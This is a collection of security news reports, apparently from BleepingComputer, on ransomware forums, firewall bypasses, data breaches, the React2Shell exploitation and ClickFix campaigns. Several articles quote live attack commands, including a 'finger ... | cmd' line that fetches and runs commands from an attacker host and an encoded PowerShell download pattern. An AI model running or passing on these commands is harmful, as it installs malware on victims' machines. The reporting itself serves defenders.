bleepingcomputer.com
By Lawrence Abrams
January 28, 2026

The FBI has seized the notorious RAMP cybercrime forum, a platform used to advertise a wide range of malware and hacking services, and one of the few remaining forums that openly allowed the promotion of ransomware operations.

Both the forum's Tor site and its clearnet domain, ramp4u[.]io, now display a seizure notice stating, "The Federal Bureau of Investigation has seized RAMP."

"This action has been taken in coordination with the United States Attorney's Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice," the notice reads.

The seizure banner also appears to taunt the forum's operators by displaying RAMP's own slogan: "THE ONLY PLACE RANSOMWARE ALLOWED!," followed by a winking Masha from the popular Russian "Masha and the Bear" kid's cartoon.

While there has been no official announcement by law enforcement regarding this seizure, the domain name servers have now been switched to those used by the FBI when seizing domains:

Name Server: ns1.fbi.seized.gov
Name Server: ns2.fbi.seized.gov
If so, law enforcement now has access to a significant amount of data tied to the forum's users, including email addresses, IP addresses, private messages, and other potentially incriminating information.

For threat actors who failed to follow proper operational security (opsec), this could lead to identification and arrests.

In a forum post to the XSS hacking forum, one of the alleged former RAMP operators known as "Stallman" confirmed the seizure.

"I regret to inform you that law enforcement has seized control of the Ramp forum," reads the translated forum post.

"This event has destroyed years of my work building the freest forum in the world, and while I hoped this day would never come, I always knew in my heart it was possible. It's a risk we all take.

BleepingComputer contacted the FBI with question regarding the seizure but they declined to comment.

The RAMP cybercrime forum
The RAMP cybercrime forum launched in July 2021, following the banning of the promotion of ransomware operations by popular Russian-speaking Exploit and XSS hacking forums.

This ban was due to heightened pressure from Western law enforcement following the DarkSide ransomware attack on Colonial Pipeline.

Exploit banning ransomware promotion
Exploit banning ransomware promotion
In July 2021, a new Russian-speaking forum called RAMP launched, promoting itself as one of the last remaining places where ransomware could be openly promoted. This led to multiple ransomware gangs using the forum to promote their operations, recruit affiliates, and buy and sell access to networks.

RAMP was launched by a threat actor known as Orange, who also operated under the aliases Wazawaka and BorisElcin.

Orange was previously the administrator of the Babuk ransomware operation, which shut down after its ransomware attack on the D.C. Metropolitan Police Department.

Internal disputes allegedly erupted within the group over whether stolen law enforcement data should be publicly leaked, and after the data was leaked, the group splintered.

Following the split, Orange launched the RAMP forum on a Tor onion domain that Babuk had previously used.

Soon after its launch, RAMP experienced distributed denial-of-service (DDoS) attacks that disrupted its availability. Orange publicly blamed former Babuk partners for the attacks, though the previous members denied responsibility to BleepingComputer, stating they had no interest in the forum.

The individual behind the Orange and Wazawaka aliases was later publicly identified by cybersecurity journalist Brian Krebs as Russian national Mikhail Matveev.

In an interview with Recorded Future's Dmitry Smilyanets, Matveev confirmed that he previously operated under the alias Orange and that he created RAMP using the former Babuk onion domain.

Matveev explained that the forum was initially created to repurpose Babuk's existing infrastructure and traffic. He claimed that RAMP ultimately generated no profit and was subjected to constant DDoS attacks, which led him to step away from managing it after it gained popularity.

In 2023, Matveev was indicted by the U.S. Department of Justice for his involvement in multiple ransomware operations, including Babuk, LockBit, and Hive, which targeted U.S. healthcare organizations, law enforcement agencies, and other critical infrastructure.

He was also sanctioned by the U.S. Treasury's Office of Foreign Assets Control and placed on the FBI's most-wanted list, with the U.S. State Department offering a reward of up to $10 million for information leading to his arrest or conviction.

bleepingcomputer.com
By Sergiu Gatlan
January 21, 2026 12:49 PM

Fortinet customers are seeing attackers exploiting a patch bypass for a previously fixed critical FortiGate authentication vulnerability (CVE-2025-59718) to hack patched firewalls.

Fortinet customers are seeing attackers exploiting a patch bypass for a previously fixed critical FortiGate authentication vulnerability (CVE-2025-59718) to hack patched firewalls.

One of the affected admins said that Fortinet has allegedly confirmed that the latest FortiOS version (7.4.10) didn't fully address this authentication bypass vulnerability, which should've been patched in early December with the release of FortiOS 7.4.9.

Fortinet is also reportedly planning to release FortiOS 7.4.11, 7.6.6, and 8.0.0 over the coming days to fully patch the security flaw.

"We just had a malicious SSO login on one of our FortiGate's running on 7.4.9 (FGT60F). We have a SIEM that caught the local admin account being created. Now, I have done a little research, and it appears this is exactly how it looked when someone came in on CVE-2025-59718. But we have been on 7.4.9 since December 30th," the admin said.

The customer shared logs showing that the admin user was created from an SSO login of cloud-init@mail.io from IP address 104.28.244.114. These logs looked similar to previous exploitation of CVE-2025-59718 seen by cybersecurity company Arctic Wolf in December 2025, which reported that attackers were actively exploiting the vulnerability via maliciously crafted SAML messages to compromise admin accounts.

"We observed the same activity. Also running 7.4.9. Same user login and IP address. Created a new system admin user named "helpdesk". We have an open ticket with support. Update: The Fortinet developer team has confirmed the vulnerability persists or is not fixed in v7.4.10," another one added.

BleepingComputer reached out to Fortinet multiple times this week with questions about these reports, but the company has yet to reply.

Until Fortinet provides a fully patched FortiOS release, admins are advised to temporarily disable the vulnerable FortiCloud login feature (if enabled) to secure their systems against attacks.

To disable FortiCloud login, you have to navigate to System -> Settings and switch "Allow administrative login using FortiCloud SSO" to Off. However, you can also run the following commands from the command-line interface:

config system global
set admin-forticloud-sso-login disable
end
Luckily, as Fortinet explains in its original advisory, the FortiCloud single sign-on (SSO) feature targeted in the attacks is not enabled by default when the device is not FortiCare-registered, which should reduce the total number of vulnerable devices.

However, Shadowserver still found over 25,000 Fortinet devices exposed online with FortiCloud SSO enabled in mid-December. At the moment, more than half have been secured, with Shadowserver now tracking just over 11,000 that are still reachable over the Internet.

CISA has also added the CVE-2025-59718 FortiCloud SSO auth bypass flaw to its list of actively exploited vulnerabilities, ordering federal agencies to patch within a week.

Hackers are now also actively exploiting a critical Fortinet FortiSIEM vulnerability with publicly available proof-of-concept exploit code that can enable them to gain code execution with root privileges on unpatched devices.

bleepingcomputer.com
By Lawrence Abrams
January 15, 2026

Exclusive: Food delivery platform Grubhub has confirmed a recent data breach after hackers accessed its systems, with sources telling BleepingComputer the company is now facing extortion demands.

"We're aware of unauthorized individuals who recently downloaded data from certain Grubhub systems," Grubhub told BleepingComputer.

"We quickly investigated, stopped the activity, and are taking steps to further increase our security posture. Sensitive information, such as financial information or order history, was not affected."

Grubhub would not respond to any further questions regarding the breach, including when it occurred, whether customer data was involved, or if they were being extorted.

However, the company confirmed that it is working with a third-party cybersecurity firm and has notified law enforcement.

Last month, Grubhub was also linked to a wave of scam emails sent from its b.grubhub.com subdomain that promoted a cryptocurrency scam promising a tenfold return on Bitcoin payments.

Grubhub said at the time that it contained the issue and took steps to prevent further unauthorized messages, but would not answer further questions related to the incident.

It is unclear if the two incidents are connected.

Extorted by hackers
While Grubhub would not share further details, multiple sources have told BleepingComputer that the ShinyHunters cybercrime group is extorting the company.

BleepingComputer attempted to verify these claims with the threat actors, but they refused to comment.

According to sources, the threat actors are demanding a Bitcoin payment to prevent the release of older Salesforce data from a February 2025 breach and newer Zendesk data that was stolen in the recent breach.

Grubhub uses Zendesk to power its online support chat system, which provides support for orders, account issues, and billing.

While it is unclear when the breach occurred, BleepingComputer was told that it was through secrets/credentials stolen in the recent Salesloft Drift data theft attacks.

In August, threat actors used stolen OAuth tokens for Salesloft's Salesforce integration to conduct a data theft campaign between August 8 and August 18, 2025.

According to a report by Google's Threat Intelligence team (Mandiant), the stolen data was then used to harvest credentials and secrets to conduct follow-up attacks on other platforms.

"GTIG observed UNC6395 targeting sensitive credentials such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens," reports Google.

ShinyHunters claimed at the time to be behind the breach, stating they stole approximately 1.5 billion data records from the "Account", "Contact", "Case", "Opportunity", and "User" Salesforce object tables for 760 companies.

As threat actors continue to abuse previously stolen Salesforce data to carry out follow-on attacks, organizations impacted by the Salesloft Drift breaches must rotate all affected access tokens and secrets as soon as possible if they have not already done so.

bleepingcomputer.com
By Sergiu Gatlan
January 5, 2026

NordVPN denied allegations that its internal Salesforce development servers were breached, saying that cybercriminals obtained "dummy data" from a trial account on a third-party automated testing platform.

The company's statement comes after a threat actor (using the 1011 handle) claimed on a hacking forum over the weekend that they stole more than 10 databases containing sensitive information like Salesforce API keys and Jira tokens, following a brute-force attack against a NordVPN development server.

"Today i am leaking +10 DB's source codes from a nordvpn development server. This information was acquired by bruteforcing a misconfigured server of Nordypn, which has salesforce and jira information stored. Compromissed information: SalesForce api keys, jira tokens and more," the threat actor said.

However, as NordVPN revealed today, this is actually test data stolen from a temporary test environment deployed months earlier during trial testing a potential vendor for automated testing.

The Lithuanian VPN service added that the test environment had no connection with its own infrastructure and that the stolen data doesn't include sensitive customer or business information.

​"The leaked elements, such as the specific API tables and database schemas can only be artifacts of an isolated third-party test environment, containing only dummy data used for functionality checks. While no data in the dump points to NordVPN, we have contacted the vendor for additional information," NordVPN explained.

"Because this was a preliminary test and no contract was ever signed, no real customer data, production source code, or active sensitive credentials were ever uploaded to this environment.

"We ultimately chose a different vendor and did not proceed with the one we tested. The environment in question was never connected to our production systems."

While this was only a false alarm, in 2019, hackers breached the servers of NordVPN and TorGuard, gaining full root access and stealing private keys used to secure their web servers and VPN configurations.

In response to the 2019 incident, NordVPN introduced a bug bounty program and hired outside cybersecurity experts for a "full-scale" third-party security audit.

The company also announced plans to switch to dedicated servers that they own exclusively and to upgrade their entire 5,100-server infrastructure to RAM servers.

bleepingcomputer.com
By Sergiu Gatlan
December 30, 2025

Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.
Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.

33-year-old Ryan Clifford Goldberg of Watkinsville, Georgia (in federal custody since September 2023), and 28-year-old Kevin Tyler Martin of Roanoke, Texas, who were charged in November, have now pleaded guilty to conspiracy to obstruct commerce by extortion and are set to be sentenced on March 12, 2026, facing up to 20 years in prison each.

Together with a third accomplice, the two BlackCat ransomware affiliates breached the networks of multiple victims across the United States between May 2023 and November 2023, paying a 20% share of ransoms in exchange for access to BlackCat's ransomware and extortion platform.

Goldberg is a former Sygnia incident response manager, and Martin worked at DigitalMint as a ransomware threat negotiator (just as the unnamed co-conspirator).

"These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop," said Assistant Attorney General A. Tysen Duva. "Extortion via the internet victimizes innocent citizens every bit as much as taking money directly out of their pockets."

According to court documents, their alleged victims include a Maryland pharmaceutical company, a California engineering firm, a Tampa medical device manufacturer, a Virginia drone manufacturer, and a California doctor's office.

While they have demanded ransoms ranging from $300,000 to $10 million, prosecutors said they were only paid $1.27 million by the Tampa medical device company after encrypting its servers and demanding $10 million in May 2023. While other victims also received ransom demands, the indictment does not indicate whether additional payments were made.

As BleepingComputer previously reported, the Justice Department was also investigating a former DigitalMint negotiator in July for allegedly working with ransomware groups. However, the DOJ and FBI did not comment on the investigation, and it is unclear if this case is related to it.

In December 2023, the FBI created a decryption tool after breaching BlackCat's servers to monitor their activities and obtain decryption keys. The FBI also found that the BlackCat operation collected at least $300 million in ransom payments from more than 1,000 victims until September 2023.

In a February 2024 joint advisory, the FBI, CISA, and the Department of Health and Human Services (HHS) also warned that Blackcat affiliates were primarily targeting organizations in the U.S. healthcare sector.

bleepingcomputer.com
By Bill Toulas
December 19, 2025

The Nigerian police have arrested three individuals linked to targeted Microsoft 365 cyberattacks via Raccoon0365 phishing-as-a-service.

The attacks led to business email compromise, data breaches, and financial losses affecting organizations worldwide.

The law enforcement operation was possible thanks to intelligence from Microsoft, shared with the Nigeria Police Force National Cybercrime Centre (NPF–NCCC) via the FBI.

The authorities identified individuals who administered the phishing toolkit ‘Raccoon0365,’ which automated the creation of fake Microsoft login pages for credential theft.

The service, which was responsible for at least 5,000 Microsoft 365 account compromises across 94 countries, was disrupted by Microsoft and Cloudflare last September.

It is unclear if the disruption operation helped identify those behind Raccoon0365 in Nigeria.

BleepingComputer contacted Microsoft for clarifications but a comment wasn't immediately available.

“Acting on precise and actionable intelligence, NPF–NCCC operatives were deployed to Lagos and Edo States, leading to the arrest of three suspects,” reads the police’s announcement.

“Search operations conducted at their residences resulted in the recovery of laptops, mobile devices, and other digital equipment, which have been linked to the fraudulent scheme after forensic analysis.”

One of the arrested suspects is an individual named Okitipi Samuel, also known online as “RaccoonO365” and “Moses Felix,” whom the police believe is the developer of the phishing platform.

Samuel operated a Telegram channel where he sold phishing kits to other cybercriminals in exchange for cryptocurrency, while he also hosted the phishing pages on Cloudflare using accounts registered with compromised credentials.

The Telegram channel counted over 800 members around the time of the disruption, and the reported access fees ranged from $355/month to $999/3 months.

Cloudflare estimates that the service is used primarily by Russia-based cybercriminals.

Regarding the other two arrested individuals, the police stated they have no evidence linking them to the Raccoon0365 operation or creation.

The person that Microsoft previously identified as the leader of the phishing service, Joshua Ogundipe, is not mentioned in the police’s announcement.

bleepingcomputer.com
By Lawrence Abrams
December 6, 2025

Over 77,000 Internet-exposed IP addresses are vulnerable to the critical React2Shell remote code execution flaw (CVE-2025-55182), with researchers now confirming that attackers have already compromised over 30 organizations across multiple sectors.

React2Shell is an unauthenticated remote code execution vulnerability that can be exploited via a single HTTP request and affects all frameworks that implement React Server Components, including Next.js, which uses the same deserialization logic.

React disclosed the vulnerability on December 3, explaining that unsafe deserialization of client-controlled data inside React Server Components enables attackers to trigger remote, unauthenticated execution of arbitrary commands.

Developers are required to update React to the latest version, rebuild their applications, and then redeploy to fix the vulnerability.

On December 4, security researcher Maple3142 published a working proof-of-concept demonstrating remote command execution against unpatched servers. Soon after, scanning for the flaw accelerated as attackers and researchers began using the public exploit with automated tools.

Over 77,000 vulnerable IP addresses
Shadowserver Internet watchdog group now reports that it has detected 77,664 IP addresses vulnerable to the React2Shell flaw, with approximately 23,700 in the United States.

The researchers determined that IP addresses were vulnerable using a detection technique developed by Searchlight Cyber/Assetnote, where an HTTP request was sent to servers to exploit the flaw, and a specific response was checked to confirm whether a device was vulnerable.

GreyNoise also recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. The researchers say the scans are primarily originating from the Netherlands, China, the United States, Hong Kong, and a small number of other countries.

Palo Alto Networks reports that more than 30 organizations have already been compromised through the React2Shell flaw, with attackers exploiting the vulnerability to run commands, conduct reconnaissance, and attempt to steal AWS configuration and credential files.

These compromises include intrusions linked to known state-associated Chinese threat actors.

Widespread exploitation of React2Shell
Since its disclosure, researchers and threat intelligence companies have observed widespread exploitation of the CVE-2025-55182 flaw.

GreyNoise reports that attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw.

These tests return predictable results while leaving minimal signs of exploitation:

powershell -c "4013841979"
powershell -c "4032043488"
Once remote code execution was confirmed, attackers were seen executing base64-encoded PowerShell commands that download additional scripts directly into memory.

powershell -enc <base64>
One observed command executes a second-stage PowerShell script from the external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads.

According to VirusTotal, the PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network.

Amazon AWS threat intelligence teams also saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw, with infrastructure associated with China-linked APT hacking groups known as Earth Lamia and Jackpot Panda.

In this exploitation, the threat actors perform reconnaissance on vulnerable servers by using commands such as whoami and id, attempting to write files, and reading /etc/passwd.

Palo Alto Networks also observed similar exploitation, attributing some of it to UNC5174, a Chinese state-sponsored threat actor believed to be tied to the Chinese Ministry of State Security.

"Unit 42 observed threat activity we assess with high confidence is consistent with CL-STA-1015 (aka UNC5174), a group suspected to be an initial access broker with ties to the Chinese Ministry of State Security," Justin Moore, Senior Manager at Palo Alto Networks Unit 42, told BleepingComputer via email.

"In this activity, we observed the deployment of Snowlight and Vshell malware, both highly consistent with Unit 42 knowledge of CL-STA-1015 (also known as UNC5174)."

The deployed malware in these attacks is:

Snowlight: A malware dropper that allows remote attackers to drop additional payloads on breached devices.
Vshell: A backdoor commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network.
The rush to patch
Due to the severity of the React flaw, companies worldwide have rushed to install the patch and apply mitigations.

Yesterday, Cloudflare rolled out emergency detections and mitigations for the React flaw in its Web Application Firewall (WAF) due to its widespread exploitation and severity.

However, the update inadvertently caused an outage affecting numerous websites before the rules were corrected.

CISA has also added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26, 2025, under Binding Operational Directive 22-01.

Organizations using React Server Components or frameworks built on top of them are advised to apply updates immediately, rebuild and redeploy their applications, and review logs for signs of PowerShell or shell command execution.

bleepingcomputer.com
By Bill Toulas
December 1, 2025

The popular open-source SmartTube YouTube client for Android TV was compromised after an attacker gained access to the developer's signing keys, leading to a malicious update being pushed to users.

The compromise became known when multiple users reported that Play Protect, Android's built-in antivirus module, blocked SmartTube on their devices and warned them of a risk.

The developer of SmartTube, Yuriy Yuliskov, admitted that his digital keys were compromised late last week, leading to the injection of malware into the app.

Yuliskov revoked the old signature and said he would soon publish a new version with a separate app ID, urging users to move to that one instead.

SmartTube is one of the most widely downloaded third-party YouTube clients for Android TVs, Fire TV sticks, Android TV boxes, and similar devices.

Its popularity stems from the fact that it is free, can block ads, and performs well on underpowered devices.

A user who reverse-engineered the compromised SmartTube version number 30.51 found that it includes a hidden native library named libalphasdk.so [VirusTotal]. This library does not exist in the public source code, so it is being injected into release builds.

"Possibly a malware. This file is not part of my project or any SDK I use. Its presence in the APK is unexpected and suspicious. I recommend caution until its origin is verified," cautioned Yuliskov on a GitHub thread.

The library runs silently in the background without user interaction, fingerprints the host device, registers it with a remote backend, and periodically sends metrics and retrieves configuration via an encrypted communications channel.

All this happens without any visible indication to the user. While there's no evidence of malicious activity such as account theft or participation in DDoS botnets, the risk of enabling such activities at any time is high.

Although the developer announced on Telegram the release of safe beta and stable test builds, they have not reached the project's official GitHub repository yet.

Also, the developer has not provided full details of what exactly happened, which has created trust issues in the community.

Yuliskov promised to address all concerns once the final release of the new app is pushed to the F-Droid store.

Until the developer transparently discloses all points publicly in a detailed post-mortem, users are recommended to stay on older, known-to-be-safe builds, avoid logging in with premium accounts, and turn off auto-updates.

Impacted users are also recommended to reset their Google Account passwords, check their account console for unauthorized access, and remove services they don't recognize.

At this time, it is unclear exactly when the compromise occurred or which versions of SmartTube are safe to use. One user reported that Play Protect doesn't flag version 30.19, so it appears safe.

BleepingComputer has contacted Yuliskov to determine which versions of the SmartTube app were compromised, and he responded with the following:

"Some of the older builds that appeared on GitHub were unintentionally compromised due to malware present on my development machine at the time they were created. As soon as I noticed the issue in late November, I immediately wiped the system and cleaned the environment, including the GitHub repository."

"I became aware of the malware issue around version 30.47, but as users reported lately it started around version 30.43. So, for my understanding the compromised versions are: 30.43-30.47."

"After cleaning the environment, a couple of builds were released using the previous key (prepared on the clean system), but from version 30.55 onward I switched to a new key for full security. The differing hashes for 30.47 Stable v7a are likely the result of attempts to restore that build after cleaning the infected system."

Update 12/2 - Added developer comment and information.

bleepingcomputer.com
By Bill Toulas
November 20, 2025

Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva.

The hacker claims to have stolen 2.3 terabytes of data and leaked it on a dark web forum. According to the threat actor's description, the leak includes confidential documents and sensitive company information.

Almaviva is a large Italian company that operates globally, providing services such as software design and development, system integration, IT consulting, and customer relationship management (CRM) products.

Andrea Draghetti, Head of Cyber Threat Intelligence at D3Lab, says the leaked data is recent, and includes documents from the third quarter of 2025. The expert ruled out the possibility that the files were recycled from a Hive ransomware attack in 2022.

"The threat actor claims the material includes internal shares, multi-company repositories, technical documentation, contracts with public entities, HR archives, accounting data, and even complete datasets from several FS Group companies," Draghetti says.

"The structure of the dump, organized into compressed archives by department/company, is fully consistent with the modus operandi of ransomware groups and data brokers active in 2024–2025," the cybersecurity expert added.

Almaviva is a major IT services provider with over 41,000 employees across almost 80 branches in Italy and abroad, and an annual turnover of $1.4 billion last year.

FS Italiane Group (FS) is a 100% state-owned railway operator and one of the largest industrial companies in the country, with more than $18 billion in annual revenue. It manages railway infrastructure, passenger and freight rail transport, and also bus services and logistics chains.

While BleepingComputer’s press requests to both Almaviva and FS went unanswered, the IT firm eventually confirmed the breach via a statement to local media.

“In recent weeks, the services dedicated to security monitoring identified and subsequently isolated a cyberattack that affected our corporate systems, resulting in the theft of some data,” Almaviva said.

“Almaviva immediately activated security and counter-response procedures through its specialized team for this type of incident, ensuring the protection and full operability of critical services.”

The company also stated that it has informed authorities in the country, including the police, the national cybersecurity agency, and the country’s data protection authority. An investigation into the incident is ongoing with help and guidance from government agencies.

Almaviva promised to transparently provide updates as more information emerges from the investigation.

Currently, it is unclear if passenger information is present in the data leak or if the data breach is impacting other clients beyond FS.

BleepingComputer has contacted Almaviva with additional questions, but we have not received a response by publication time.

bleepingcomputer.com
By Sergiu Gatlan
November 21, 2025

American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots taken on internal systems with hackers after they were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors.

However, the company noted that its systems were not breached as a result of this incident and that customers' data was not compromised.

"We identified and terminated a suspicious insider last month following an internal investigation that determined he shared pictures of his computer screen externally," a CrowdStrike spokesperson told BleepingComputer today.

"Our systems were never compromised and customers remained protected throughout. We have turned the case over to relevant law enforcement agencies."

CrowdStrike did not specify the threat group responsible for the incident or the motivations of the malicious insider who shared screenshots.

However, this statement was provided in response to questions from BleepingComputer regarding screenshots of CrowdStrike systems that were recently posted on Telegram by members of the threat groups ShinyHunters, Scattered Spider, and Lapsus$.

ShinyHunters told BleepingComputer earlier today that they allegedly agreed to pay the insider $25,000 to provide them with access to CrowdStrike's network.

The threat actors claimed they ultimately received SSO authentication cookies from the insider, but by then, the suspected insider had already been detected by CrowdStrike, which had shut down his network access.

The extortion group added that they also attempted to purchase CrowdStrike reports on ShinyHunters and Scattered Spider, but did not receive them.

BleepingComputer contacted CrowdStrike again to confirm if this information is accurate and will update the story if we receive additional information.

The Scattered Lapsus$ Hunters cybercrime collective
These groups, now collectively calling themselves "Scattered Lapsus$ Hunters," have previously launched a data-leak site to extort dozens of companies impacted by a massive wave of Salesforce breaches.

Scattered Lapsus$ Hunters have been targeting Salesforce customers in voice phishing attacks since the start of the year, breaching companies such as Google, Cisco, Allianz Life, Farmers Insurance, Qantas, Adidas, ​​​​​​Workday, as well as LVMH subsidiaries, including Dior, Louis Vuitton, and Tiffany & Co.

Companies they attempted to extort include high-profile brands and organizations, such as Google, Cisco, Toyota, Instacart, Cartier, Adidas, Sake Fifth Avenue, Air France & KLM, FedEx, Disney/Hulu, Home Depot, Marriott, Gap, McDonald's, Walgreens, Transunion, HBO MAX, UPS, Chanel, and IKEA.

Scattered Lapsus$ Hunters also claimed responsibility for the Jaguar Land Rover (JLR) breach, stealing sensitive data and significantly disrupting operations, resulting in damages of over £196 million ($220 million) in the last quarter.

As BleepingComputer reported this week, the ShinyHunters and Scattered Spider extortion groups are switching to a new ransomware-as-a-service platform named ShinySp1d3r, after previously using other ransomware gangs' encryptors in attacks, including ALPHV/BlackCat, RansomHub, Qilin, and DragonForce.

This Thursday, ShinyHunters also claimed a new wave of data theft attacks that allegedly impacted Salesforce instances belonging to over 280 companies. In Telegram messages today, they said the list of breached companies contains multiple high-profile names, including LinkedIn, GitLab, Atlassian, Thomson Reuters, Verizon, F5, SonicWall, DocuSign, and Malwarebytes.

As the threat actors told BleepingComputer yesterday, they compromised the Salesforce instances after breaching Gainsight using secrets stolen in the Salesloft drift breach.

bleepingcomputer.com
By Lawrence Abrams
November 15, 2025

The decades-old "finger" command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.

In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol, a command later added to Windows. While still supported, it's rarely used today compared to its popularity decades ago.

When executed, the finger command returns basic information about a user, including their login name, name (if set in /etc/passwd), home directory, phone numbers, last seen, and other details.

Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks that retrieve commands to execute on devices.

This is not the first time the finger command has been abused in this way, as researchers warned in 2020 that it was used as a LOLBIN to download malware and evade detection.

Abusing the finger command
Last month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would use the "finger root@finger.nateams[.]com" command to retrieve commands from a remote finger server, which were then run locally by piping them through cmd.exe.

While that host is no longer accessible, MalwareHunterTeam found additional malware samples and attacks utilizing the finger command.

For example, a person on Reddit recently warned that they fell victim to a ClickFix attack that impersonated a Captcha, prompting them to run a Windows command to verify they were human.

"I just fell for verify you are human win + r. What do I do?," reads the Reddit post.

"I was in a rush and fell for this and ended up entering the following in my cmd prompt:"

"cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER'"

Although the host is no longer responding to finger requests, another Reddit user captured the output.

This attack abuses the Finger protocol as a remote script delivery method, by running finger vke@finger.cloudmega[.]org and piping its output through the Windows command processor, cmd.exe.

This causes the retrieved commands to be executed, which creates a random-named path, copies curl.exe to a random filename, uses the renamed curl executable to download a zip archive disguised as a PDF [VirusTotal] from cloudmega[.]org, and extracts a Python malware package.

The Python program will then be executed using pythonw.exe init.py.

The final command executed is a call back to the attacker's server to confirm execution, while displaying a fake "Verify you are human" prompt to the user.

It is unclear what the purpose of the Python package is, but a related batch file indicates it was an infostealer.

MalwareHunterTeam also found a similar campaign that uses "finger Kove2@api.metrics-strange.com | cmd" to retrieve and run commands almost identical to the previously mentioned ClickFix attack.

BleepingComputer found this to be a more evolved attack, with the commands looking for tools commonly used in malware research and exiting if found. These tools include filemon, regmon, procexp, procexp64, tcpview, tcpview64, Procmon, Procmon64, vmmap, vmmap64, portmon, processlasso, Wireshark, Fiddler, Everywhere, Fiddler, ida, ida64, ImmunityDebugger, WinDump, x64dbg, x32dbg, OllyDbg, and ProcessHacker.

If no malware analysis tools are found, the commands will download a zip archive disguised as PDF files and extract it. However, instead of extracting a malicious Python package from the fake PDF, it extracts the NetSupport Manager RAT package.
The commands will then configure a scheduled task to launch the remote access malware when the user logs in.

While the current 'finger' abuse appears to be carried out by a single threat actor conducting ClickFix attacks, as people continue to fall for them, it is essential to be aware of the campaigns.

For Defenders, the best way to block the use of the finger command is to block outgoing traffic to TCP port 79, which is what is used to connect to a daemon over the Finger protocol.

bleepingcomputer.com
By Bill Toulas
November 12, 2025

An advanced threat actor exploited the critical vulnerabilities “Citrix Bleed 2" (CVE-2025-5777) in NetScaler ADC and Gateway, and CVE-2025-20337 affecting Cisco Identity Service Engine (ISE) as zero-days to deploy custom malware.

Amazon’s threat intelligence team, analyzing “MadPot” honeypot data, found that hackers leveraged the two security issues before the security issues were disclosed publicly and patches became available.

“Our Amazon MadPot honeypot service detected exploitation attempts for the Citrix Bleed Two vulnerability (CVE-2025-5777) prior to public disclosure, indicating a threat actor had been exploiting the vulnerability as a zero-day,” explains Amazon.

“Through further investigation of the same threat exploiting the Citrix vulnerability, Amazon Threat Intelligence identified and shared with Cisco an anomalous payload targeting a previously undocumented endpoint in Cisco ISE that used vulnerable deserialization logic.”

Citrix Bleed 2 is a NetScaler ADC and Gateway out-of-bounds memory read problem that the vendor published fixes for in late June.

Although the vendor needed a longer period to confirm that the flaw was leveraged in attacks, despite multiple third-party reports claiming it was used in attacks, exploits became available in early July, and CISA tagged it as exploited.

The flaw in ISE (CVE-2025-20337), with a maximum severity score, was published on July 17, when Cisco warned that it could be exploited to let an unauthenticated attacker store malicious files, execute arbitrary code, or gain root privileges on vulnerable devices.

In less than five days, the vendor reissued its warning about CVE-2025-20337 being actively exploited. On July 28, researcher Bobby Gould published technical details in a write-up that included an exploit chain.

In a report shared with BleepingComputer, Amazon says that both flaws were leveraged in APT attacks before Cisco and Citrix published their initial security bulletins.

The hackers leveraged CVE-2025-20337 to gain pre-auth admin access to Cisco ISE endpoints, and deployed a custom web shell named ‘IdentityAuditAction,’ disguised as a legitimate ISE component.

The web shell registered as an HTTP listener to intercept all requests and used Java reflection to inject into Tomcat server threads.

It also employed DES encryption with non-standard base64 encoding for stealth, required knowledge of specific HTTP headers to access, and left minimal forensic traces behind.

The use of multiple undisclosed zero-day flaws and the advanced knowledge of Java/Tomcat internals and the Cisco ISE architecture all point to a highly resourced and advanced threat actor. However, Amazon could not attribute the activity to a known threat group.

Curiously, though, the targeting appeared indiscriminate, which doesn’t match the typically tight scope of highly targeted operations by such threat actors.

It is recommended to apply the available security updates for CVE-2025-5777 and CVE-2025-20337, and limit access to edge network devices through firewalls and layering.

bleepingcomputer.com
By Lawrence Abrams
November 11, 2025

The Rhadamanthys infostealer operation has been disrupted, with numerous

The Rhadamanthys infostealer operation has been disrupted, with numerous “customers” of the malware-as-a-service reporting that they no longer have access to their servers.

Rhadamanthys is an infostealer malware that steals credentials and authentication cookies from browsers, email clients, and other applications. It is commonly distributed through campaigns promoted as software cracks, YouTube videos, or malicious search advertisements.

The malware is offered on a subscription model, where cybercriminals pay the developer a monthly fee for access to the malware, support, and a web panel used to collect stolen data.

According to cybersecurity researchers known as g0njxa and Gi7w0rm, who both monitor malware operations like Rhadamanthys, report that cybercriminals involved in the operation claim that law enforcement gained access to their web panels.

In a post on a hacking forum, some customers state that they lost SSH access to their Rhadamanthys web panels, which now require a certificate to log in rather than their usual root password.

"If your password cannot log in. The server login method has also been changed to certificate login mode, please check and confirm, if so, immediately reinstall your server, erase traces, the German police are acting," wrote one of the customers.

Another Rhadamanthys subscriber claimed they were having the same issues, with their server's SSH access now also requiring certificate-based logins.

"I confirm that guests have visited my server and the password has been deleted.rootServer login became strictly certificate-based, so I had to immediately delete everything and power down the server. Those who installed it manually were probably unscathed, but those who installed it through the "smart panel" were hit hard," wrote another subscriber.

A message from the Rhadamanthys developer says they believe German law enforcement is behind the disruption, as web panels hosted in EU data centers had German IP addresses logging in before the cybercriminals lost access.

